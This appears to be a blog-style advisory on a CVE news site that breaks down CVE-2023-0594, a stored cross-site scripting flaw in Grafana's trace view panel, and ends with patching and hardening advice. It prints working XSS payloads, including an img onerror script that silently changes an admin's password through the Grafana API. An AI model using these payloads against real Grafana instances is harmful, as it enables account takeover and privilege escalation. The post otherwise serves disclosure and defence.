CVE CyberSecurity Database News

CVE-2023-0594 - Grafana Stored XSS in Trace View Visualization—Complete Breakdown

Poster -

---

Grafana makes it easy to keep an eye on your systems and applications by providing advanced dashboards and visualizations. But with power comes responsibility—and sometimes, vulnerabilities. One such issue is CVE-2023-0594, a severe stored XSS (Cross-Site Scripting) flaw affecting Grafana’s trace view visualization.

In this post, I’ll explain the vulnerability, show how it can be exploited, and guide you on how to keep your Grafana setup secure.

What is CVE-2023-0594?

This vulnerability affects Grafana versions 7.+ and allows attackers with *Editor* permissions to inject malicious JavaScript code into dashboards using the trace view panel. Since the sanitization of span attribute/resource values is missing or incomplete, the code gets rendered when another user expands those values in the UI.

Impact: If an Admin user views the tainted dashboard, the attacker can perform actions on their behalf—including resetting the admin password or escalating their privileges—using cleverly crafted JavaScript.

Grafana 7. until versions 8.5.21, 9.2.13, and 9.3.8 are patched.

- Any user with Editor rights can exploit the flaw if other users (including Admins) view affected dashboards.

Let’s break it down step by step.

1. Editor Access: An attacker with Editor permission edits a dashboard, specifically a trace view panel.
2. Payload Injection: The attacker adds a malicious JavaScript payload as a span attribute/resource value.
3. Trigger: An Admin user views or interacts with the panel (like expanding a trace attribute/resource).

Execution: The attacker’s JS payload runs in the Admin’s browser context.

This is classic stored XSS, and because the code runs in the context of an Admin session, it can do anything the Admin can.

Code Example: Injecting a Simple XSS Payload

Here’s a redacted example of how an Editor might inject JavaScript into the trace view visualization:

{
  "type": "trace",
  "options": {
    "spans": [
      {
        "attributes": {
          "http.url": "<img src=x onerror='alert(\"XSS by Editor!\")'>"
        }
      }
    ]
  }
}

Whenever someone expands this span’s attributes, alert("XSS by Editor!") will execute in the user’s browser.

Proof-of-Concept (POC): Setting a Known Admin Password

A more dangerous payload than an alert box could force a password change, assuming Grafana’s default admin routes/UI are accessible and there are no anti-CSRF measures in place.

Here’s a simplified JS payload to automatically submit a password change (proof-of-concept only)

<img src="x" onerror="
fetch('/api/admin/users/1/password', {
  method: 'PUT',
  headers: {
    'Content-Type': 'application/json'
  },
  body: JSON.stringify({
    password: 'newStrongPassword123'
  }),
  credentials: 'include'
})
">

When an Admin expands the malicious attribute, their browser silently tries to change the Admin password.

Note: Modern Grafana versions have protections, but if the instance is unpatched and other security features are lax, vertical privilege escalation is possible.

- Grafana Security Advisory for CVE-2023-0594
- CVE Details for CVE-2023-0594
- Official Patch Release Notes

How to Fix and Protect Your Instance

1. Upgrade Immediately:  
Patch your Grafana instances to 8.5.21, 9.2.13, 9.3.8, or higher.
- See latest Grafana releases.

2. Review Permissions:  
Don’t grant Editor or higher privileges unless absolutely needed.

3. Audit Dashboards:  
Manually check for suspicious trace panel attribute values if patching is delayed.

4. Use Web Security Best Practices:

Ensure strong authentication (not default passwords).

- Limit access to trusted networks/users.

Exclusive Wrap-Up

CVE-2023-0594 is a powerful reminder that not all threats involve outside hackers: sometimes, it just takes an over-privileged user and a missed sanitization check. If you use Grafana for monitoring or observability, keep your versions up-to-date and review your permission structure.

Stay safe, stay patched. If you found this article useful, share it with your team—don’t let an Editor pwn your Admin!


*(This post is original and designed for clarity. If you need help patching your Grafana instance, feel free to ask!)*

Timeline

Published on: 03/01/2023 16:15:00 UTC
Last modified on: 03/09/2023 00:55:00 UTC